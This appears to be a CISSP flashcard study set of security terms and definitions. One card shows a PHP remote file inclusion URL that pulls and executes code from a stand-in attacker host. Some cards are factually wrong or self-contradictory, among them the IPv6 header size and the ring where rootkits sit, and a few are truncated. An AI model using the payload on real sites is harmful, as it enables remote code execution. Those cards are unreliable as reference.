CISSP Study Set


Ethernet

dominant local area networking technology that transmits network data via frames. Originally physical bus, now supports physical star. Evolved to 1000 megabits to 10

Add Round Key

Final function applied in each round; XORs the state with the subkey. The subkey is derived from the key.

Differential Cryptanalysis

find the "difference" between related plaintexts that are encrypted. The plaintexts may differ by a few bits.

Origin of Term: Computer

first used in 1613 to describe a person who added numbers

Static Routes

fixed routing entries, saying "The route for network 10.0.0.0/8 routes via router 192.168.2.7."

The User Acceptance test

focuses mainly on the functionality, thereby validating the fitness-for-use of the system by the business user.

Cache Memory

is the fastest memory on the system, required to keep up with the CPU as it fetches and executes instructions. Fastest portion is the register file

Host-to-gateway(IPsec)

Client mode: used to connect one system that runs IPsec client software to an IPsec gateway.

Core Impact

Closed Source Penetration Testing Tool

Closed source

Closed source software is software typically released in executable form

SSO Disadvantages

Difficult to retrofit. Unattended desktop. Single point of attack/failure

Elliptic Curve Cryptography

ECC leverages a one-way function that uses discrete logarithms as applied to elliptic curves

HEPA

High efficiency particulate air filters

HDLC

High-Level Data Link Control. Successor to SDLC. HDLC adds error correction and flow control. ARM and ABM modes.

IPID

IP Identification field is used to re-associate fragmented packets. "Copy this data beginning at offset 1480."

Data Owner

Also called the Information Owner. A management employee responsible for ensuring that specific data is protected.

Information Security Governance

Information Security at the organizational level. It is the organizational priority provided by senior leadership.

Interrupt

Interrupts are a form of asynchronous event, i.e., the CPU stops processing its current task.

Token Ring (Deterministic)

Legacy. Possession of a token allows a node to read or write traffic on a network

VPN

Protected via standards-based end-to-end encryption, e.g., an IPsec VPN. May be used as a measure in defense in depth.

RAID

Redundant Array of Inexpensive Disks; aims to mitigate the risk associated with hard disk failure.

Semantic integrity

each attribute (column) value is consistent with the attribute data type

ePHI and HIPAA

electronic Protected Healthcare Information (ePHI). 2009 update to the U.S. Health Insurance Portability and Accountability Act. Encrypted health information is a requirement.

Dynamic Signature

measure the process by which someone signs his/her name.

Partial-Knowledge

are in between zero and full knowledge: the penetration tester receives some limited trusted information.

POPv3

is used for client-server email access

2nd Gen Language

assembly

Assess

assess the extent of the damage to determine the proper steps necessary to ensure the organization's ability to meet its mission and Maximum Tolerable Downtime (MTD).

Backups

assure the availability and integrity of mobile data

Script Kiddies

attack computer systems with tools they have little or no understanding of, e.g., the Metasploit framework.

Inference

attacker must logically deduce missing details: unlike aggregation, a mystery must be solved.

Time of Check/Time of Use Attacks

attacks are also called race conditions: an attacker attempts to alter a condition after it has been checked by the operating system, but before it is used.

Disassembler

attempts to convert machine language into assembly.

Root-cause analysis

attempts to determine the underlying weakness or vulnerability that allowed the incident to be realized.

Organization Registration Authorities(ORAs)

authenticate the identity of a certificate holder before issuing a certificate to them

Object Oriented Database

combines data with functional code in an object-oriented framework/infrastructure.

Pipelining

combines multiple steps into one combined process. Pipeline depth is the number of simultaneous stages that may be completed at once. Like an automobile assembly line.

Hybrid Analysis

combines objective quantitative analysis and subjective qualitative analysis.

Computer Crime: 3 Types

computer systems as targets, computer systems as a tool to perpetrate the crime, or computer systems involved but incidental.

Level 2 Caches

connected to (but outside) the CPU. SRAM is used for cache memory.

Host-to-Host/Transport Layer

connects the Internet Layer to the Application Layer; aligns with Layer 4 (Transport) of the OSI model.

Customary Law

customs or practices that are so commonly accepted by a group that the custom is treated as law. The concept of "best practices" is closely associated with customary law.

Slack space

data is stored in specific size chunks known as clusters (clusters are sometimes also referred to as sectors or blocks)

Layer 6 - Presentation

presents data to the application (and user) in a comprehensible way

Account lockouts

prevent an attacker from being able to simply guess the correct password by attempting a large number of potential passwords

Interface Testing

primarily concerned with appropriate functionality being exposed across all the ways users can interact with the application.

Symmetric ciphers

primarily used for confidentiality

Rootkits

replaces portions of the kernel and/or operating system. Lies in ring 3. Commonly rootkitted binaries include the ls or ps commands on Linux/UNIX.

Object-Oriented Programming (OOP)

replicates the use of objects in computer programs.

NIDS

require promiscuous network access in order to analyze all traffic

Health Insurance Portability and Accountability Act (HIPAA)

requires that medical providers keep the personal and medical information of their patients private.

Pool NAT

reserves a number of public IP addresses in a pool

Scoping

the process of determining which portions of a standard will be employed by an organization, e.g., wireless provisions for a wireless company would be out of scope.

Software Escrow

the process of having a third party store an archive of computer software. Often negotiated as part of a contract with a proprietary software vendor

Facial Scan

the process of passively taking a picture of a subject's face and comparing that picture to a list stored in a database

Client-Side Attacks

user downloads malicious content. Difficult for organizations that allow Internet access. Clients include word processing software, spreadsheets, media players, and web browsers, e.g., Flash, Acrobat, iTunes, QuickTime.

Multicast

uses "Class D" addresses when used over IPv4, e.g., streaming audio or video

Traceroute

uses ICMP Time Exceeded messages to trace a network route

War dialing

uses a modem to dial a series of phone numbers. Looks for answering modem carrier.

Dictionary Attack

uses a word list: a predefined list of words, and each word in the list is hashed. If the cracking software matches the hash output from the dictionary attack to the password hash, the attacker has successfully identified the original password.

Hacker

A malicious individual who attacks computer systems.

AES

Advanced Encryption Standard. Current US standard for symmetric block cipher. Uses 128-bit (10 rounds), 192-bit (12 rounds), or 256-bit (14 rounds) keys. FIPS-approved standard until 2030.

Internet Layer

Aligns with Layer 3 (Network) of the OSI model

CMP

Crisis Management Plan designed to provide effective coordination among the managers of the organization in the event of an emergency or disruptive event.

Socket Pairs

Describes a unique connection between two nodes. "Established" during a connection

Information Flow Model

Describes how information may flow in a secure system.

Biometric Enrollment

Describes the process of registering with a biometric system. Creating an account for the first time

Compliance(Policy)

Describes two related issues: How to judge the effectiveness of the policies(how well they work), and what happens when the policy is violated.

SDLC 5

Design

Compliance acceptance testing

Also known as regulation acceptance testing; performed against the regulations that must be adhered to, such as governmental, legal, or safety regulations.

PPP

Layer 2 protocol that has largely replaced SLIP. PPP is based on HDLC (discussed previously) and adds confidentiality, integrity, and authentication via point-to-point links. Synchronous links (T1s).

SLIP

Layer 2 protocol that provides IP connectivity via asynchronous connections such as serial lines and modems

Switch

Layer 2, based on MAC

Router

Layer 3 devices that route traffic from one LAN to another LAN. IP-based routers make routing decisions based on the source and destination IP addresses.

Routers

Layer 3 devices that route traffic from one LAN to another

Router

Layer 3, based on IP

Packet Filter and Stateful Firewalls

Layers 3 and 4. IP Addresses and Ports.

FDDI

Legacy. Fiber Distributed Data Interface. A logical network ring via a primary and secondary counter-rotating fiber optic ring

Unit Testing

Low-level tests of software components, such as functions, procedures or objects

Virtualization Benefits

Lower hardware cost, less cooling needs, snapshots allow reversion to past states.

Water(Fire)

Lowers temperature

1st Gen Language

Machine Code

802.1X

Port Based Network Access Control. Includes EAP

Detective Controls

They alert during or after a successful attack. Intrusion detection systems(IDS) and CCTV are examples of detective controls.

Archive Bits

This bit is a file attribute used to determine whether a file has been archived since last modification. Incremental will set bit from 1 to 0 after backup.

Static testing

includes walkthroughs, syntax checking, and code reviews

Screened Host Architecture

is an older flat network design using one router to filter external traffic to and from a bastion host.

DCOM

locate objects over a network.

Business Continuity Plan

long-term plan to ensure the continuity of business operations

Volatile Memory

loses integrity after power loss.

Remote Journaling

may be used to recover from a database failure.

Evacuation Routes

meeting points are critical.

Return on Investment

money saved by deploying a safeguard

Preponderance

more likely than not.

Hashing

one way cryptographic transformation

Unicast

one-to-one traffic, such as a client surfing the Web

Hash Function

one-way encryption that uses an algorithm and no key

Crippleware

partially functioning proprietary software, often with key features disabled.

Magnetic Stripe Card

passive device that contains no circuits. Read when swiped through a card reader.

Cohesive Object

performs most functions independently. Inverse relation to coupling.

EU-US Safe Harbor

personal data of EU Citizens may not be transmitted, even when permitted by the individual, to countries outside the EU unless the receiving country is perceived by the EU to adequately protect data.

Security Safeguards Principle

personal data should be reasonably protected against unauthorized use.

Use Limitation Principle

personal data should never be disclosed without either the consent of the individual or as the result of a legal requirement

Smart Card

physical access control device that is often used for electronic locks and credit card purchases. Can be contact or contactless.

Procedural languages

programming languages that use subroutines, procedures, and functions

Top-Down (TD)

programming starts with the broadest and highest level requirements (the concept of the final program)

Surge

prolonged high voltage

Blackout

prolonged loss of power

Corrective Controls

work by "correcting" a damaged system or process. Corrective controls typically work hand-in-hand with detective controls. Antivirus software is an example.

Pattern Matching IDS

works by comparing events to static signatures

Coupled Object

requires lots of other objects to perform basic jobs, like math. Inverse to cohesion

Broadcast

sent to all stations on a LAN

Shadow Database

serves as a live backup for a database. Not regularly accessed by the client.

Circumstantial Evidence

serves to establish the circumstances related to particular points or even other evidence.

Fault

short loss of power

Fences

simple deterrent

Unlicensed Band

small amount of contiguous radio spectrum set aside for unlicensed

Applets

small pieces of mobile code that are embedded in other software such as Web browsers. Executables written in a variety of languages.

Register

small storage locations used by the CPU to store instructions and data.

Cryptographic requirements

speed, strength, cost, complexity must be weighed against each other.

Weak Tranquility Property

states that security labels will not change in a way that conflicts with defined security properties

Strong Tranquility Property

states that security labels will not change while the system is operating.

Dynamic Random Access Memory (DRAM)

stores bits in small capacitors (like small batteries), and is slower and cheaper than SRAM. DRAM capacitors leak charge, so they must be continually refreshed to maintain integrity.

Multilevel

stores objects of differing sensitivity labels and allows system access by subjects with differing clearances. A reference monitor mediates access between subjects and objects.

Compilers

take source code in a higher-level language such as C or BASIC and compile it into machine code.

Soda Acid

suppresses fire by starving it of oxygen

Mirroring

used to achieve full data redundancy by writing the same data to multiple hard disks

SMTP

used to transfer email between servers

Processes and Threads

A process is an executable program. A heavyweight process (HWP) is also called a task. A parent process may spawn child processes called threads. Because they share memory, threads are less resource-intensive.

Procurement

Process of acquiring products or services from a 3rd party.

ISO 17799

Renumbered to 27002 in 2005. ISO 27001 is a related standard, formally called ISO/IEC 27001:2005 Information Security Management Systems - Requirements. Based on BS 7799 Part 2.

Hub

Repeater with two or more ports. No security, no isolation. Half duplex. One collision domain. Unsuitable for modern purposes.

ROC

Report of Compliance

RFC

Request for Comments, a way to discuss and publish standards on the Internet

Security Policies and Procedures

Required parts of any successful information security program.

SDLC 4

Requirements Analysis

Technical Countermeasures

Routers, switches, firewalls.

User Access Permissions Table

Rows show the capabilities of each subject (capability list). Columns show the ACL for each object or application.

Paravirtualization

Runs Modified OS

Multiprocessing

Runs multiple processes on multiple CPUs. Two types of multiprocessing: Symmetric Multiprocessing (SMP)

iSCSI

SAN protocol that allows for leveraging existing networking infrastructure and protocols to interface with storage

ECB

Simplest and weakest form of DES. No initialization vector (IV) or chaining. Identical plaintexts encrypted with identical keys produce identical ciphertext. **BLOCK**

Annualized Loss Expectancy(ALE)

SLE × ARO; cost of losses per year

The TCP handshake

SYN, SYN-ACK, ACK. The client chooses an initial sequence number, set in the first SYN packet. Once a connection is established, ACKs typically follow for each segment

Preamble

Safety of the commonwealth, duty to our principals, and to each other requires that we adhere to the highest ethical standards of behavior.

RAID 4

Same as RAID 3, but stripes data at the block level.

Side-Channel Attack

Side-channel attacks use physical data to break a cryptosystem, such as monitoring CPU cycles or power consumption used while encrypting or decrypting

Cipher Feedback

Similar to CBC. CFB is a stream mode cipher, uses an IV (random number/nonce), and errors propagate. **STREAM**

SMTP

Simple Mail Transfer Protocol, a store-and-forward protocol used to exchange email between servers

SNMP

Simple Network Management Protocol, primarily used to monitor network devices. HP OpenView and MRTG use SNMP

Vernam Cipher

Simple XOR cipher that can be implemented with phone switches.

Thin Clients

Simpler than normal computer systems, which have hard drives, full operating systems, locally installed applications, etc. They rely on servers for applications and storage of associated data, e.g., diskless workstations. Use a Web browser as a universal client.

Asymmetric and Symmetric Tradeoffs

Asymmetric is slower than symmetric, and weaker per bit of key length. But much more secure.

SCSI

Small Computer System Interface Disk Drive

Band

Small amount of contiguous radio spectrum. Wireless tech uses 2.4 and 5 GHz.

FCoE

Fibre Channel over Ethernet. A Storage Area Network (SAN) protocol that leverages Fibre Channel, which has long been used for storage networking.

Data at Rest

Stored Data. Residing on a Disk or In a File.

Firmware

Stores small programs that do not change frequently, such as a computer's BIOS. Router OS.

Stream Cipher

Stream modes (ciphers) mean each bit is independently encrypted.

RAID 3

Striped Set with Dedicated Parity (Byte Level). Striping is desirable due to the performance gains associated with spreading data across multiple disks. An additional disk is leveraged for storage of parity information, which is used for recovery in the event of a failure.

RAID 5

Striped Set with Distributed Parity. Focus on striping for the performance increase. And parity in case of failure

RAID 6

Striped Set with Dual Distributed Parity

RAID 0

Striped Set: employs striping to increase the performance of reads and writes

Bollard

Strong post designed to stop a car; also used to tie a ship to a pier. Installed in front of buildings to protect them. Large concrete planters are used to the same effect.

Writing Up

Subject writes up; data flows up.

Qualitative Analysis

Subjective analysis of approximate values

Role-Based Access Controls

Subjects are grouped into roles and each defined role has access permissions based upon the role, not the individual

Polyalphabetic cipher

Substitution

File Permissions

Such as read, write, and execute, control access to files.

BCP/DRPaS

SunGard Casualty Services (IBM)

Tailoring Process: 5

Supplementing baselines with additional security controls and control enhancements, if needed; and

Pairwise Testing

Suppose we want to demonstrate that a new software application works correctly on PCs that use the Windows or Linux operating systems.

Thrashing

Swapping memory from active processes when both RAM and swap space are full. Impacts availability.

SPAN ports

A Switched Port Analyzer (SPAN) port is one way to see unicast traffic sent to and from other devices on the same switch. SPAN (Cisco), Mirror (HP). Can be the cause of bandwidth overload (e.g., a 24-port switch mirroring 23 100 Mbit streams).

Kerberos Characteristics

Symmetric encryption. Provides mutual authentication of both clients and servers. Protects against network sniffing and replay attacks.

14:SYN

Synchronize a connection

Integration Testing

Testing multiple software components as they are combined into a working system. Subsets may be tested, or Big Bang integration testing tests all integrated software components

Regression Testing

Testing software after updates, modifications, or patches

Installation Testing

Testing software as it is installed and first operated

User Acceptance Testing

Testing that is done directly by the customer.

Static Testing

Tests code passively: the code is not running.

Dynamic Testing

Tests code while executing it

***Canons Note***

The canons are applied in order, and when faced with an ethical dilemma, you must follow the canons in order. i.e.

Difference between Reading Up & Writing Down

The direction that information is being passed

Security Target (ST)

The documentation describing the ToE, including the security requirements and operational environment

Full Backup

The easiest to understand of the types of backup; it simply is a replica of all allocated data on a hard disk. Time is a con

Target of Evaluation(ToE)

The system or product that is being evaluated

Modem

"Modulator/Demodulator": takes binary data and modulates it into analog sound that can be carried on phone networks designed to carry voice.

Bell-LaPadula Security Model

"No Read Up" (NRU). Also known as the Simple Security Property. Focused on protecting confidentiality.

Simple Integrity Axiom

"No read down:" a subject at a specific classification level cannot read data at a lower classification. Prevents the movement of bad information.

Simple Security Property

"No read up:" a subject at a specific classification level cannot read an object at a higher classification level. 'Secret' Clearance holders not able to access 'Top Secret'

* Security Property (Star Security Property)

"No write down." A subject at a higher classification level cannot write to a lower classification level.

* Integrity Axiom

"No write up:" A subject at specific classification level cannot write to data at a higher classification.

PROM

(Programmable Read Only Memory) can be written to once, typically at the factory.

Reserved Ports

0-1023

Class A

0.0.0.0 - 127.255.255.255 16,777,216 addresses

Project Initiation

1. Develop the contingency planning policy statement 2. Conduct the business impact analysis (BIA) 3. Identify preventive controls 4. Develop recovery strategies 5. Develop an IT contingency plan 6. Plan testing, training, and exercises 7. Plan maintenance

BIA Processes

1. Identification of Critical Assets 2. Comprehensive Risk Assessment

CHAP Process

1. Server sends a challenge 2. The user takes the challenge string and the password, uses a hash cipher such as MD5. 3. The CHAP server also hashes the password and challenge, creating the expected response

AES Four Functions

1. SubBytes 2. ShiftRows 3. MixColumns 4. AddRoundKey. The functions provide confusion, diffusion, and XOR encryption.

COBIT; 4 domains

1. Plan and Organize 2. Acquire and Implement 3. Deliver and Support 4. Monitor and Evaluate

TGT Lifetime

10 Hours

Ephemeral Ports

1024-65535

IPv6 header

128 bits in all (addresses use colons instead of periods). Fields: Version (IP version), Traffic Class and Flow Label, Payload Length, Next Header, Hop Limit. Examples: fc01::20c:29ff:feef:1136/64 (Scope: Global), fe80::20c:29ff:feef:1136/64 (Scope: Link).

Class B

128.0.0.0 - 191.255.255.255, 65,536 addresses

Bluetooth(802.15)

2.4 GHz like 802.11. Transmits data over short distances. Class 3: under 10 meters; Class 2: 10 meters; Class 1: 100 meters. Automatic discovery should be off.

IPv4 Header Fields

20 bytes in all. Fields: Version, IHL (length of the IP header), Type of Service, Identification, Flags, Offset, Time To Live, Protocol, Source and Destination IP addresses, Options (optional).

802.11 Security

802.11 wireless security standards (including WEP and 802.11i/WPA2)

Types of Wireless

802.11: 2 Mbps/2.4 GHz; 802.11a: 54 Mbps/5 GHz; 802.11b: 11 Mbps/2.4 GHz; 802.11g: 54 Mbps/2.4 GHz; 802.11n: 72-600 Mbps/2.4 GHz and 5 GHz

Supplicant

802.1X client

Object

A "black box" that combines code and data, and sends and receives messages

Rainbow Tables

A Rainbow Table is a pre-computed compilation of plaintexts and matching ciphertexts (typically passwords and their matching hashes)

Penetration Tester

A White Hat Hacker who receives authorization to attempt to break into an organization's physical or electronic perimeter.

Backup

A backup is the most basic and obvious measure to increase system or data fault tolerance by providing for recoverability in the event of a failure.

Switch

A bridge with two or more ports. Best practice: connect one device per switch port. Associates the MAC address of each computer and server with its port. Shrinks the collision domain.

Memory

A series of on-off switches representing bits: 0 is off, 1 is on. Random Access Memory, Sequential Memory, and Read Only Memory are all types.

Tape Rotation Methods

A common tape rotation method is called FIFO

Removable Media Controls

A common vector for malware propagation is the AutoRun feature of many recent Microsoft operating systems. Turn off Autorun functionality.

Licenses

A contract between a provider of Software and the consumer.

Remote wipe capability

Ability to erase data from a lost or stolen device remotely.

Ring Model

A form of CPU hardware layering that separates and protects domains. Ex: Intel x86, has four rings ranging from 0(kernel) to ring 3 (user). Innermost ring is most trusted. Concentric communication between rings

Clearance

A formal determination of whether or not a user can be trusted. Requires an interview.

Hub

A half duplex device. Like a repeater but with more than two ports. (No Security). Cannot send and receive simultaneously. Can provide

Caesar Cipher

A historical example of a substitution cipher.

Known Plaintext Attack

A known plaintext attack relies on recovering and analyzing a matching plaintext and ciphertext pair. Multiple ciphertexts may be encrypted with the same key.

Retina Scan

A laser scan of the capillaries that feed the retina. Retina scans are rarely used because of health risks and invasion-of-privacy issues

Lights

A light that allows a guard to see an intruder is acting as a detective control. Fresnel lenses to aim light in a specific direction. Measured in Lumens

Spring-bolt lock

A locking mechanism that "springs" in and out of the doorjamb

Process Isolation

A logical control that attempts to prevent one process from interfering with another. This is a common feature among multi-user operating systems; OSs like MS-DOS lack process isolation. Another user should not be able to have an effect on that process (Trojan).

***EXAM Warning***

A logical ring can run via a physical ring, but there are exceptions. FDDI uses both a logical and physical ring.

Hanlon's Razor

A maxim that reads "Never attribute to malice that which is adequately explained by stupidity."

Meet-in-the-Middle Attack

A meet-in-the-middle attack encrypts on one side, decrypts on the other side, and meets in the middle. Attack against Double DES, which encrypts with two keys ("Encrypt, Encrypt"). Seeks to recover the two keys used to encrypt.

Redundant Array of Inexpensive Disks

A method of using multiple disk drives to achieve greater data reliability, greater speed, or both

Callback

A modem-based authentication system. Callback account is created, the modem number the user will call from is entered into the account.

Advanced Encryption Standard

A modern cipher

DevOps

A more agile development and support model echoing the agile programming methods. "the practice of operations and development engineers participating together in the entire service lifecycle, from design through the development process to production support."

TACACS

A centralized access control system that requires users to send an ID. TACACS uses UDP port 49 (and may also use TCP). Reusable passwords are a vulnerability.

Object

A passive data file

Ring Topology

A physical ring connects network nodes in a ring

Covert Channel

A policy-violating communication that is hidden from the owner or user of a data system. There are unused fields within the TCP/IP headers which may be used for covert channels. E.g., obfuscation.

Mantrap

A preventive physical control with two doors. Each door requires a separate form of authentication to open

ISO/IEC 24762:2008

A separate ISO plan for disaster recovery. Information technology—Security techniques—Guidelines for information and communications technology disaster recovery services.

Clark-Wilson

A real world integrity model that protects integrity by requiring subjects to access objects via programs. Effectively limits the capabilities of the subject. Well formed transactions, Separation of Duties.

Packet Filter

A simple and fast firewall. Has no concept of state. Decisions are made on basis of single packet. EG: allows ICMP Echo Replies, and UDP DNS Replies.

Counter-based synchronous dynamic tokens

A simple counter: the authentication server expects token code 1, and the user's token displays the same code 1. Once used, the token displays the second code, and the server also expects token code 2. PIN

IPsec Security Association (SA)

A simplex (one-way) connection that may be used to negotiate ESP or AH parameters. A unique 32-bit number called the Security Parameter Index (SPI) identifies each simplex SA connection.

Procedure

A step-by-step guide for accomplishing a task. Like Policies, they are mandatory

Access Control Matrix

A table that defines access permissions between specific subjects and objects. A matrix is a data structure that acts as a table lookup for the operating system.

Fuzzing

A type of black box testing that submits random, malformed data as inputs into software programs to determine if they will crash

Roaming Infected Laptop

A user with an infected laptop plugs into a typical office network and requests an IP address from a DHCP server. Once given an IP, the malware installed on the laptop begins attacking other systems on the network. EAP Protects. WLANs are susceptible

Transformation Procedure (TP)

A well-formed transaction, and a constrained data item (CDI) is data that requires integrity. For each TP, an audit record is made and entered into the access control system. Provides both detective and recovery controls in case integrity is lost.

Abstraction

Abstraction hides unnecessary details from the user. Complexity is the enemy of security. The more complex a process, the less secure it is. User presses play; hears music.

Need to Know

Access determination is based upon clearance levels of subjects and classification levels of objects. A form of Mandatory Access Control.

2 Types of NIPS

Active Response, and Inline

ActiveX

ActiveX controls are the functional equivalent of Java applets. They use digital certificates instead of a sandbox to provide security.

8:CWR

Added in 2001: Congestion Window Reduced

9:ECE

Added in 2001: Explicit Congestion Notification Echo

Fire Class A

A: Ordinary combustibles: wood, paper, rubber, plastic

Asynchronous Balanced Mode

ABM: a node may initiate transmissions without receiving permission.

Malware

AKA malicious code. The generic term for any type of software that attacks an application or system: viruses, worms, Trojans, logic bombs.

Note!

All information security professionals should understand Hanlon's Razor. There is plenty of malice in our world: worms, phishing attacks, identity theft, etc. But there is more brokenness and stupidity: most disasters are caused by user error. "Never attribute to malice that which is adequately explained by stupidity."

Convergence

All routers on a network agree on the state of routing. A network that has experienced no recent outages is normally "converged". Closest routers know of outage first.

Application Whitelisting

Allowing binaries to run only if they: are signed via a trusted code signing digital certificate; match a known good cryptographic hash; or have a trusted full path and name.

Decentralized access control

Allows IT administration to occur closer to the mission and operations of the organization. An organization spans multiple locations, and the local sites support and maintain independent systems, access control databases, and data

Multitasking

Allows multiple tasks (heavyweight processes) to run simultaneously on one CPU. Older OSs are non-multitasking.

Hypervisor

Allows multiple virtual guest operating systems to run on one host

Trusted Computer System Evaluation Criteria(TCSEC)

Also known as the Orange Book

PHP Remote File Inclusion (RFI)

Altering normal PHP URLs and variables such as "http://good.example.com?file=readme.txt" to include and execute remote content, such as: http://good.example.com?file=http://evil.example.com/bad.php [42]

NIPS

Alters the flow of the traffic. Two types: Active Response and Inline.

***EXAM WARNING*** Best thing to do?

Always consider "hire or ask an expert" as a valid choice in regards to "the best thing to do." The safest answer is often the best. The legal, ethical, and fair answer is usually the best as well.

***EXAM WARNING***

Always ensure that any forensic actions uphold integrity, and are legal and ethical.

SIGABA

American encryption device

Subject

An active entity on a data system. People accessing data files, or a DLL or Perl script that updates database files with new information.

Collusion

An agreement between two or more individuals to subvert the security of a system

Waterfall Model

An application development model that uses rigid phases; when one phase ends, the next begins

WLAN DoS

An attacker can pollute the wireless spectrum (channel interference)

VMEscape

An attacker exploits the host OS or a guest from another guest. IDSs and IPSs can be blinded by virtualization: a SPAN port cannot see traffic between virtual hosts.

Protection Profile(PP)

An independent set of security requirements and objectives for a specific category of products or systems, such as firewalls or intrusion detection systems (IDS)

Implementation Attacks

An implementation attack exploits a mistake (vulnerability) made while implementing an application

International Common Criteria

An internationally agreed upon standard for describing and testing the security of IT products. Designed to avoid requirements beyond current state of the art. Presents a hierarchy of requirements for a range of classifications and systems.

Iris Scan

An iris scan is a passive biometric control. A camera takes a picture of the iris. Compares photos within the authentication database

Object

Any passive data within the system. Objects can range from documents on physical paper, to database tables to text files. Objects are passive; they do not manipulate other objects.

Preventive Controls

Apply restrictions to what a potential user, either authorized or unauthorized, can do. Pre-employment drug screening is preventive.

Tailoring Process: 2

Applying scoping considerations to the remaining baseline security controls;

Turnstiles

Are designed to prevent tailgating by enforcing one-person authentication

Baselines

Are uniform ways of implementing a standard. "Harden the system by applying the Center for Internet Security Linux benchmarks." Discretionary

ANN

Artificial Neural Network seeks to replicate the capabilities of biological neural networks.

Humidity Levels

Computers and Data Centers: 40-55% humidity, 68-77 degrees F. Sufficient airflow is key. The green push has recently widened the acceptable range for temperature and humidity levels.

NIST SP800-34

A specific set of requirements to review and implement a sound BCP: • Project Initiation • Scope the Project • Business Impact Analysis • Identify Preventive Controls • Recovery Strategy • Plan Design and Development • Implementation, Training, and Testing • BCP/DRP Maintenance

PCI Qualified Security Assessor

Assesses the security of an organization that uses credit cards. A Report on Compliance (ROC) and Attestation of Compliance (AOC) may be issued.

Tailoring Process: 4

Assigning specific values to organization-defined security control parameters via explicit assignment and selection statements

Trademarks

Associated with marketing. The purpose is to allow for the creation of a brand that distinguishes the source of products or services.

Wireless Security

Associated with shared tenancy. Wireless attacks raise concerns

3 A's of Access Control

Authentication, Authorization, and Accountability

Penetration Testing

Authorized attempt to break into an organization's physical or electronic perimeter (and sometimes both)

Routing Protocols

Automatically learn a network topology and determine the best routes between all network points. Employ backup routes in case of router outage.

Security Awareness and Training

Awareness changes user behavior. Training provides a skill set.

Kerberos 4

Any user may request a session key for another user. Kerberos does not mitigate a malicious local host: plaintext keys may exist in memory or cache.

Fire Class B

B: Flammable Liquids: liquids, greases, gases

ISO/IEC-27031

BCP Guidelines: 1. Provide a framework (methods and processes) for any organization 2. Identify and specify all relevant aspects 3. Enable an organization to measure its continuity and security 4. ICT: Information and Communications Technology 5. ISMS: Information Security Management System

EGP

BGP

CWE: Hard-coded credentials

Backdoor username/passwords left by programmers in production code

BIOS

Basic Input Output System(BIOS) Firmware is stored in ROM. While ROM is read-only, some types of ROM can be written to via flashing.

Star topology

Has become the dominant physical topology for LANs

Block Cipher

Block mode ciphers encrypt a block of data each round.

BOOTP

Bootstrap Protocol, used (in conjunction with TFTP for download) for bootstrapping via a network by diskless systems. BIOSs now support BOOTP.

BGP

Border Gateway Protocol, the routing protocol used on the Internet. Has distance vector properties but is formally considered a path vector routing protocol.

CPU

Brains of the computer. Capable of performing complex mathematical calculations. Rated by number of clock cycles per second. 2.4 GHz has 2.4 Billion clock cycles per second.

ISO 17799

Broad based approach for Information Security code of practice. Full title ISO/IEC 17799:2005. Code of Practice for Information Security Management.

Electronic Communications Privacy Act(ECPA)

Brought search and seizure protection to non-telephony electronic communications. Protects from warrantless wiretapping. The PATRIOT Act weakened some of the ECPA restrictions.

Senior Management

Business Owners and Mission Owners. Ensuring all organizational assets are protected.

Primary Information Security Roles

Business Owners, Mission Owners, Data Owners, System Owners, Custodians, and Users.

Fuji-Xerox

Business scholars and practitioners were asking such questions as "What are the key factors to the Japanese manufacturers' remarkable successes?"

Trade Secrets

Business-proprietary information that is important to an organization's ability to compete. Business information that provides a competitive edge. Due care and due diligence must be exercised.

Biba Model

Businesses desire to ensure that the integrity of their information is protected at the highest level; ensuring integrity protection is vital. Has two primary rules: the Simple Integrity Axiom and the Integrity Axiom. Reverses the Bell-LaPadula rules.

Fire Class C

C: Electrical Equipment

CIA Write Up Concept

CIA operates intelligence collection using the write up concept. The sensitivity of the final object will be much higher than the level of access of any of the agents.

3rd Gen Language

COBOL, C, Basic

COOP

Continuity Of Operations Plan. Sustains an organization's essential, strategic functions at an alternate site for up to 30 days.

Random Access Memory(RAM)

The CPU may randomly access (jump to) any location in memory. Volatile, but not as volatile as it was once believed.

CTR

CTR is counter mode. This mode shares the same advantages as OFB (patterns are destroyed and errors do not propagate). **STREAM**

Cable modems

Used by cable TV providers to provide Internet access via broadband cable TV. Unlike DSL, cable modem bandwidth is typically shared with neighbors on the same network segment.

Tree Topology

Called hierarchical network: a network with a root node, and branch nodes that are at least three levels deep.

Dust

Can cause static buildup and overheating

Vendor, Consultant, and Contractor Security

Can introduce risks to an organization. Third party personnel with access to sensitive data must be trained properly

CSMA/CD

Carrier Sense Multiple Access with Collision Detection used to immediately detect collisions within a network

CSMA

Carrier Sense Multiple Access: Shared usage on Ethernet. Avoid collisions

Embedded Device Forensics

Cell phones, GPS receiver and PDA (Personal Digital Assistant) devices are so common that they have become standard in today's digital examinations. Common carriers of Malware.

CHAP

Challenge Handshake Authentication Protocol. It uses a central location that challenges remote users. As stated in the RFC, "CHAP depends upon a 'secret' known only to the authenticator and the peer." A sniffer that views the entire challenge/response process will not be able to determine the shared secret.

Asynchronous dynamic tokens

Challenge-response tokens. Challenge-response token authentication systems produce a challenge, or input for the token device. PIN

Dynamic passwords

Change at regular intervals. RSA Security makes a synchronous token device called SecurID that generates a new token code every 60 seconds

Layered Design

Changing your physical network connection from wired to wireless (At Layer 1) has no effect on your Web Browser(at Layer 7)

Contraband Checks

Checks identifying objects that are prohibited. Port blocking used in conjunction with contraband checks is part of Defense in Depth.

TPM

Chip on the system motherboard for authenticity. Ensures boot integrity. Protects against kernel-mode rootkits; used for full disk encryption.

CBC

Cipher Block Chaining: DES mode that XORs the previous encrypted block with the next block of plaintext to be encrypted. The first block is XORed with an IV. Encryption errors propagate. **BLOCK**

Running Key Cipher

Cipher that uses modular math

4th Gen Language

ColdFusion, Progress 4GL, Oracle Reports

Credential Set

Combination of both the identification and authentication of a user.

Network Access Layer

Combines Layer 1 (Physical) and Layer 2 (Data Link) of the OSI model.

Application Layer

Combines Layers 5 through 7 (Session, Presentation, and Application) of the OSI model

COTS Software

Commercial Off-the-Shelf

Secondary Evidence

Common in cases involving computers. Consists of copies of original documents and oral descriptions, e.g., logs.

Sharia Law

Common religious law for Islam. It uses the Qur'an and Hadith as its foundation.

Port Isolation

Commonly employed with the increasing density of virtualized systems in datacenters. Severely limits lateral movement. Generally cumbersome if not done virtually.

Mirroring

Complete duplication of data to another disk, used by some levels of RAID.

CISC

Complex Instruction Set Computer. Uses large set of complex machine language instructions.

COM

Component Object Model locates objects on a local system

IAB Practice 5

Compromises the privacy of users.

Source code

Computer programming language instructions that are written in text that must be translated into machine code before execution by the CPU

Computer Systems as a Target

Computer system serves as primary target. DDoS, Installing Malware for Spam, Exploiting Vulnerabilities

Bots

